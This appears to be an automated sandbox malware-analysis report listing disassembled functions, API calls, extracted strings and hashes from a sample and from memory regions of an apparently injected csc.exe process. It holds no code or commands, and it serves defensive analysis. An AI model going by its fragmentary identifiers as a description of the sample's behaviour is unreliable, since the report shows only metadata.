                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2370478142-962849395
                                                                                                                                                      • Opcode ID: 7adb8718d87319c61736e1b84bd5aceaaf98a07f724dacc252fa01d443a5dae3
                                                                                                                                                      • Instruction ID: 651e35afa5efbdb74e46a8e88ce115f4b797959aa4cbf5ed1c5213b777d4a3a3
                                                                                                                                                      • Opcode Fuzzy Hash: 7adb8718d87319c61736e1b84bd5aceaaf98a07f724dacc252fa01d443a5dae3
                                                                                                                                                      • Instruction Fuzzy Hash: BA519371A00209AFDB04DFA8C841BEEB7B5FF58314F14416AE805E7392D779AE85CB54
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0040F311
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040F326
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: 735b278d4fc60832f83ebed191691e287c1e416a9d264ce587dfdb858bb362f9
                                                                                                                                                      • Instruction ID: 4f6dfa4c55e2a7fe9fe8bf20358b23f4b48a3eb26038b4de4cdee703bad351b0
                                                                                                                                                      • Opcode Fuzzy Hash: 735b278d4fc60832f83ebed191691e287c1e416a9d264ce587dfdb858bb362f9
                                                                                                                                                      • Instruction Fuzzy Hash: D451ADB1A00244DFC710DF9CDD41B8AB7B5FB49324F14827AE8159B7A1D7B8A904CB58
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000003FF,00000000,00000000,?), ref: 0040F45A
                                                                                                                                                      • _wcsrchr.LIBCMT ref: 0040F482
                                                                                                                                                      Strings
                                                                                                                                                      • LocalizeStringManager using %s as current directory, xrefs: 0040F537
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName_wcsrchr
                                                                                                                                                      • String ID: LocalizeStringManager using %s as current directory
                                                                                                                                                      • API String ID: 2248907744-3895964262
                                                                                                                                                      • Opcode ID: 7cd2c1b80a029071a3d868f380ad8c9d071f960110b7558a6fa8be9300c1221a
                                                                                                                                                      • Instruction ID: 4914ca9474b3b6dcf73fb687ff8e699b62779e70258942b32276ef7647460a0e
                                                                                                                                                      • Opcode Fuzzy Hash: 7cd2c1b80a029071a3d868f380ad8c9d071f960110b7558a6fa8be9300c1221a
                                                                                                                                                      • Instruction Fuzzy Hash: 73418031A006099FD720DF68CC41B9AB3B8FF44324F14C7BAE569972D1DB74AA46CB94
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004111CD
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004111E2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: f543cbc906ccd7650bb8cef791ecf8621ec6dbe073bee27d7945717985af6bf3
                                                                                                                                                      • Instruction ID: f8c27ee7699648d13f13efa6e74f78b5188a6d8a1a52f74fbe54ada12fea284d
                                                                                                                                                      • Opcode Fuzzy Hash: f543cbc906ccd7650bb8cef791ecf8621ec6dbe073bee27d7945717985af6bf3
                                                                                                                                                      • Instruction Fuzzy Hash: 7121D1B2A04209ABC710DF98D941ADAF7F8EB48314F10466FE558E3741D774AA40C7A5
                                                                                                                                                      APIs
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000409), ref: 00412DB5
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 00412DEC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatFreeLocalMessage
                                                                                                                                                      • String ID: Error Code: %d
                                                                                                                                                      • API String ID: 1427518018-2830492919
                                                                                                                                                      • Opcode ID: 3415c24533acf48bc6660d8af8cfce90d1b605f354cacb28b3ad35756c2ea678
                                                                                                                                                      • Instruction ID: a3734aff581861bf4bd9e8a013a4e5c8eddb5f0eb71fb30c564b9f95807e7a34
                                                                                                                                                      • Opcode Fuzzy Hash: 3415c24533acf48bc6660d8af8cfce90d1b605f354cacb28b3ad35756c2ea678
                                                                                                                                                      • Instruction Fuzzy Hash: 7A21D672B04208AFC710DF99EC81BABF7B8FB48765F44413BE909D3380D6745D0086A4
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcAddress.KERNEL32(Command,Command), ref: 00406CF1
                                                                                                                                                        • Part of subcall function 00406EB0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,0040EFC6,?,?,?,?), ref: 00406EC3
                                                                                                                                                        • Part of subcall function 00406EB0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,-00000001,?,?,?), ref: 00406EF7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$AddressProc
                                                                                                                                                      • String ID: Command$Could not resolve entrypoint '%hs'
                                                                                                                                                      • API String ID: 2457830408-477499498
                                                                                                                                                      • Opcode ID: a9f7127ece779c968760b600d952e9c33bb55f2fbd910c81e7ff8309745010cc
                                                                                                                                                      • Instruction ID: 02b3cd1bbd1a4042562dcd474d745e4de0b4e4c892e2f8a9ac46497f55fea694
                                                                                                                                                      • Opcode Fuzzy Hash: a9f7127ece779c968760b600d952e9c33bb55f2fbd910c81e7ff8309745010cc
                                                                                                                                                      • Instruction Fuzzy Hash: 89218B71700205AFD714DF58DC41BAAB7A9FF44324F01437AF926E73D1DB78A9048A98
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004123E1
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004123F6
                                                                                                                                                        • Part of subcall function 00401900: _memcpy_s.LIBCMT ref: 0040195A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_malloc_memcpy_sstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 1787139365-962849395
                                                                                                                                                      • Opcode ID: 388a42301bbcb7613fab76e40e9462ebc7aecf3065e82f0e0dac7605c1fedc70
                                                                                                                                                      • Instruction ID: 6ea011b9a4285e4b5e01de87a8495eb2b241b38f0326e3fd5f69aa65fd4c8ce2
                                                                                                                                                      • Opcode Fuzzy Hash: 388a42301bbcb7613fab76e40e9462ebc7aecf3065e82f0e0dac7605c1fedc70
                                                                                                                                                      • Instruction Fuzzy Hash: 20219DB2A006499FCB10DFA8D541A9EFBF4FB48704F10866FE459E3741DB74AA00CBA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404B96
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404BAB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: 61c1e7d8d0493a0aa168af15573492feea997b9efbd426ed01a61629bdfa5d77
                                                                                                                                                      • Instruction ID: fe2611e71e1b4d3eab35b47a04658717641b3f6e96e165b590f39325d49202ba
                                                                                                                                                      • Opcode Fuzzy Hash: 61c1e7d8d0493a0aa168af15573492feea997b9efbd426ed01a61629bdfa5d77
                                                                                                                                                      • Instruction Fuzzy Hash: 811193B5900218DFCB00DF59D841BDEFBB4FB44754F10862EE815A7381D779A604CBA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004109EB
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00410A00
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: e868a53083fa1d7e98f619ebe31d704fd0f5ffdd214e531418ba4b8e1b0047f6
                                                                                                                                                      • Instruction ID: 166044deac4ff419852e9ba3ba567c278087cb3695f227ff17d03246f23ed495
                                                                                                                                                      • Opcode Fuzzy Hash: e868a53083fa1d7e98f619ebe31d704fd0f5ffdd214e531418ba4b8e1b0047f6
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21ACB5A00248DFCB00DF99C841ADAFBF4EB48B04F10856FE819A7342D734AA04CBA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004067BF
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004067D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2621100827-962849395
                                                                                                                                                      • Opcode ID: d8b1f9951333e666c1138fb743c057d0b6af5fc21088406b91705fcf76692e51
                                                                                                                                                      • Instruction ID: 442295aed09c8a9df1bfa44d5f6881dde2d5152ee126d028579eef18df08d8eb
                                                                                                                                                      • Opcode Fuzzy Hash: d8b1f9951333e666c1138fb743c057d0b6af5fc21088406b91705fcf76692e51
                                                                                                                                                      • Instruction Fuzzy Hash: 3321FFB1900714CFC720DF5AC841A9AFBF4FB48714F104A2FE85AA3781E738A645CB99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0041166A
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041167F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2621100827-962849395
                                                                                                                                                      • Opcode ID: 5e83b65dfe0557c6d34ed6807040035208e33360ec2f6d9411a2bf6e0ed9750e
                                                                                                                                                      • Instruction ID: d126037be6ae07cf9ee6d5e3eb27cb285719d2fc9e1c908c41d8478ed4238dae
                                                                                                                                                      • Opcode Fuzzy Hash: 5e83b65dfe0557c6d34ed6807040035208e33360ec2f6d9411a2bf6e0ed9750e
                                                                                                                                                      • Instruction Fuzzy Hash: 3B21CDB1940314DFDB10DF95D901BDAB7F4EB04B08F00462EE906A7390E7B8A644CB99
                                                                                                                                                      APIs
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000409,00000000,00000000,00000000,?,00000000,?,?,0040EF71), ref: 0041259F
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040EF71), ref: 004125DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatFreeLocalMessage
                                                                                                                                                      • String ID: Error Code: %d
                                                                                                                                                      • API String ID: 1427518018-2830492919
                                                                                                                                                      • Opcode ID: 1d525a71e8cb5eb276d91495dc9543d69531f819657fa8b75fdd5f8205834c02
                                                                                                                                                      • Instruction ID: 08fe6bb4c81252aca13f7875fe807113bfd974ddb72ba397d731f5de95ab752b
                                                                                                                                                      • Opcode Fuzzy Hash: 1d525a71e8cb5eb276d91495dc9543d69531f819657fa8b75fdd5f8205834c02
                                                                                                                                                      • Instruction Fuzzy Hash: 10012B32B00214BBD7305665AC56FDB775DDF85BA4F000167FE09DB280E5B0DE1082E8
                                                                                                                                                      APIs
                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0040DF96
                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0040DFAA
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memcpy_s$Exception@8Throw
                                                                                                                                                      • String ID: Core\
                                                                                                                                                      • API String ID: 93487992-2534804690
                                                                                                                                                      • Opcode ID: a8657365fd312069ee0ef6f088e6ad1ec9ad73d0cb6b13340a8482a65472dfbb
                                                                                                                                                      • Instruction ID: 96814e4bfe430db7b348c38a6644ee4befebf0edd7ee54b93e1ec2a703856812
                                                                                                                                                      • Opcode Fuzzy Hash: a8657365fd312069ee0ef6f088e6ad1ec9ad73d0cb6b13340a8482a65472dfbb
                                                                                                                                                      • Instruction Fuzzy Hash: CA01C4317006149FD710DF6ACC84D6AB7E9EF89364B04406AFC0A9B355C675AC408BE4

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:11.4%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:21
                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                      execution_graph 40426 505f5c0 40428 505f5d3 40426->40428 40430 505f678 40428->40430 40431 505f6c0 VirtualProtect 40430->40431 40433 505f65b 40431->40433 40434 9378530 40435 9378545 40434->40435 40437 93788ad 40435->40437 40439 93788b9 40437->40439 40438 937890c 40438->40435 40439->40438 40442 93f2758 40439->40442 40446 93f2748 40439->40446 40445 93f2763 40442->40445 40443 93f2967 40443->40439 40444 93f27ed KiUserExceptionDispatcher 40444->40445 40445->40443 40445->40444 40449 93f2763 40446->40449 40447 93f2967 40447->40439 40448 93f27ed KiUserExceptionDispatcher 40448->40449 40449->40447 40449->40448 40450 505f828 40451 505f868 CloseHandle 40450->40451 40453 505f899 40451->40453
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                      • API String ID: 0-3443518476
                                                                                                                                                      • Opcode ID: ba1e63aa09872773f5e19a07ed9ad756d4132cfd4cbeb3264aace792439d70c6
                                                                                                                                                      • Instruction ID: a978617c12304fae967d73819225294855ff92b60d5fa138ad6b28b0ec2b4676
                                                                                                                                                      • Opcode Fuzzy Hash: ba1e63aa09872773f5e19a07ed9ad756d4132cfd4cbeb3264aace792439d70c6
                                                                                                                                                      • Instruction Fuzzy Hash: 84B20834A00218DFDB18DFA9C895BADB7B6BF48700F158599E505AB3A9DB70EC42CF50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                                      • API String ID: 0-324474496
                                                                                                                                                      • Opcode ID: 8507f3e97acddaf2d7ad4e14c0ea6395276d9b5e01f63cf8704385c6342c2a3a
                                                                                                                                                      • Instruction ID: db928b667ac6a1f2559ef9334a9e0ce79868555e3b4e7a939b29ca5460b37f30
                                                                                                                                                      • Opcode Fuzzy Hash: 8507f3e97acddaf2d7ad4e14c0ea6395276d9b5e01f63cf8704385c6342c2a3a
                                                                                                                                                      • Instruction Fuzzy Hash: 26220A34A04219CFDB24DFA5C895BADB7B2BF48304F158099E509AB3A5DB71ED82CF50
                                                                                                                                                      APIs
                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 093F27F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047307627.00000000093F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_93f0000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                      • Opcode ID: f7d069d8dc41e410dc9187b1ca59dfed9a19bd57788e2c02221793f3d8e70488
                                                                                                                                                      • Instruction ID: 7336c5f0cceb1865db94246e0c6490ec9c9eed724a8c4af25d4cc4758a62a2d4
                                                                                                                                                      • Opcode Fuzzy Hash: f7d069d8dc41e410dc9187b1ca59dfed9a19bd57788e2c02221793f3d8e70488
                                                                                                                                                      • Instruction Fuzzy Hash: 205161343002408FC7A4EBB9E0A9B7A37D3FB9D621F069569D54ACB391CE385C42CB51
                                                                                                                                                      APIs
                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 093F27F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047307627.00000000093F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_93f0000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$4c]q$4c]q$4c]q$4c]q$Haq
                                                                                                                                                      • API String ID: 0-535247161

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                                      • API String ID: 0-463314800

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $Haq$Haq$Haq
                                                                                                                                                      • API String ID: 0-432640594

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4c]q$4c]q$4c]q$Haq
                                                                                                                                                      • API String ID: 0-1741209197

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0o@p$Dq@p$Lj@p$Lj@p
                                                                                                                                                      • API String ID: 0-4286108749

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Haq$Haq$Haq
                                                                                                                                                      • API String ID: 0-3013282719
                                                                                                                                                      • Opcode ID: ce27645bad791f91cdd840158daa83e5c56582ef20c6ceae57093fef7cb01aa7
                                                                                                                                                      • Instruction ID: c09377e8dcc57935bd8797364d280620e2717f27f253942e64a0a5017cf6d7e5
                                                                                                                                                      • Opcode Fuzzy Hash: ce27645bad791f91cdd840158daa83e5c56582ef20c6ceae57093fef7cb01aa7
                                                                                                                                                      • Instruction Fuzzy Hash: 6A025B30A00605CFDB25EFA5C8946AEB7F2FF88304F648529E5469B764DB31AC46CF91

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q$4']q
                                                                                                                                                      • API String ID: 0-705557208
                                                                                                                                                      • Opcode ID: f9e99522db68b25727695de2edff098fc276d0eb30df93d82279425a94aac7fd
                                                                                                                                                      • Instruction ID: b2487fc9f02778b644f62a4d6cee8378e7cfb143587d17c48a759f3df84b1852
                                                                                                                                                      • Opcode Fuzzy Hash: f9e99522db68b25727695de2edff098fc276d0eb30df93d82279425a94aac7fd
                                                                                                                                                      • Instruction Fuzzy Hash: 6DF1BB34A10218DFCB08EFA4D998A9DBBB2FF88304F158559E506AB365DB71EC42CF51

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$(aq$Haq
                                                                                                                                                      • API String ID: 0-2456560092
                                                                                                                                                      • Opcode ID: 47855bf9704b974bcd2392c4a96564fc38c73e0925c3f23f22448524f9bbb8a9
                                                                                                                                                      • Instruction ID: 867271a16bd6cd15a183fd1a9f5d4971d0c11c985a262fb9a9019d76b4713522
                                                                                                                                                      • Opcode Fuzzy Hash: 47855bf9704b974bcd2392c4a96564fc38c73e0925c3f23f22448524f9bbb8a9
